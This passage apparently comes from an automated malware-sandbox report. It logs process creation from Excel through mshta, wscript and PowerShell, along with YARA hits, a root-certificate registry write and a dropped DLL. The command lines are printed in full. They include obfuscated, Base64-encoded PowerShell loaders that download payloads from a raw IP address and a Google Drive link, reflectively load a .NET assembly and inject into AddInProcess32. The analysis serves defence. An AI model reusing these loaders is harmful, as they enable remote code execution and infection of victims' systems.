Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))"
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))"Jump to behavior
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKDBRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl04OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )"
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKDBRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl04OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )"Jump to behavior
                Source: Yara matchFile source: 16.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 1488, type: MEMORYSTR
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_000007FE899B022D push eax; iretd 6_2_000007FE899B0241
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_000007FE899B00BD pushad ; iretd 6_2_000007FE899B00C1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 16_2_00402AC0 push eax; ret 16_2_00402AD4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 16_2_00402AC0 push eax; ret 16_2_00402AFC

                Persistence and Installation Behavior

                barindex
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.dllJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
